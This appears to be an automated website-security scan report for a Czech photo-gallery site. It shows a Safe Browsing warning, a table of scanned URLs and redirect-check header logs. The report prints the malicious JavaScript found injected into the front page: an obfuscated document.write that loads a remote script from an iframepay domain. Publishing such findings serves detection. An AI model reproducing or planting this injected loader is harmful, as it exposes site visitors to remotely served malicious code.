Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=photogallery.krejcik.eu
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://photogallery.krejcik.eu/ | 200 OK Content-Length: 25876 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var ifpc_id = "12582"; var ifpc_url = document.location; var ifpc_rnd = Math.random(); document.write('<scr'+'ipt type="text/javascript" src="http://ifr'+'amepay.'+'com/t'+'ds/js.p'+'hp"></scr'+'ipt>'); Antivirus reports:
| ||
http://photogallery.krejcik.eu/scripts.js | 200 OK Content-Length: 5193 Content-Type: application/javascript | clean |
http://www.fotobanka.fotky-foto.cz/affiliate/get_ad.php?ad=2&pa=50 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=1209600 Connection: close Date: Thu, 25 Dec 2014 17:53:14 GMT Location: http://fotky-foto.cz/affiliate/get_ad.php?ad=2&pa=50 Server: Apache Content-Length: 395 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 08 Jan 2015 17:53:14 GMT | clean |
http://fotky-foto.cz/affiliate/get_ad.php?ad=2&pa=50 | 200 OK Content-Length: 344 Content-Type: text/html | clean |
http://fotky-foto.cz/ | 200 OK Content-Length: 31013 Content-Type: text/html | clean |
http://fotky-foto.cz//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js/ | 404 Not Found Content-Length: 20040 Content-Type: text/html | clean |
http://fotky-foto.cz/js/jquery-ui-1.9.2.custom.min.js | 200 OK Content-Length: 237798 Content-Type: application/x-javascript | clean |
http://fotky-foto.cz/js/jquery.tip.min.js | 200 OK Content-Length: 7027 Content-Type: application/x-javascript | clean |
http://fotky-foto.cz/js/jquery.cookie.js | 200 OK Content-Length: 3095 Content-Type: application/x-javascript | clean |
http://fotky-foto.cz/js/funkce_2.js | 200 OK Content-Length: 6766 Content-Type: application/x-javascript | clean |
http://fotky-foto.cz/js/oblibene_new9.js | 200 OK Content-Length: 8714 Content-Type: application/x-javascript | clean |
http://fotky-foto.cz/js/analytics.js | 200 OK Content-Length: 3008 Content-Type: application/x-javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12798 Content-Type: application/javascript | clean |
http://fotky-foto.cz/fotobanka/page/kontakty/ | 200 OK Content-Length: 20222 Content-Type: text/html | clean |
http://fotky-foto.cz/js/captcha.js | 200 OK Content-Length: 172 Content-Type: application/x-javascript | clean |
http://download.skype.com/share/skypebuttons/js/skypeCheck.js | 200 OK Content-Length: 21434 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: photogallery.krejcik.eu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 17:53:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: 316dc04d174079fbea9619442aa2b1e2=e5f5586abf90a5578fd6d6c731eb5dde; expires=Thu, 08-Jan-2015 17:53:26 GMT; path=/
Set-Cookie: cpg143_data=YToyOntzOjI6IklEIjtzOjMyOiIyNWJiYTVjYzQ4ZTIyNTU1NDJmNjQ5Yzk4YTMzZjEwZSI7czoyOiJhbSI7aToxO30%3D; expires=Sat, 24-Jan-2015 17:53:27 GMT; path=/
X-Powered-By: PHP/5.2.17-0.dotdeb.0
GET / HTTP/1.1
Host: photogallery.krejcik.eu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 17:53:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: 316dc04d174079fbea9619442aa2b1e2=e5f5586abf90a5578fd6d6c731eb5dde; expires=Thu, 08-Jan-2015 17:53:26 GMT; path=/
Set-Cookie: cpg143_data=YToyOntzOjI6IklEIjtzOjMyOiIyNWJiYTVjYzQ4ZTIyNTU1NDJmNjQ5Yzk4YTMzZjEwZSI7czoyOiJhbSI7aToxO30%3D; expires=Sat, 24-Jan-2015 17:53:27 GMT; path=/
X-Powered-By: PHP/5.2.17-0.dotdeb.0
Second query (visit from search engine):
GET / HTTP/1.1
Host: photogallery.krejcik.eu
Referer: http://www.google.com/search?q=photogallery.krejcik.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: photogallery.krejcik.eu
Referer: http://www.google.com/search?q=photogallery.krejcik.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.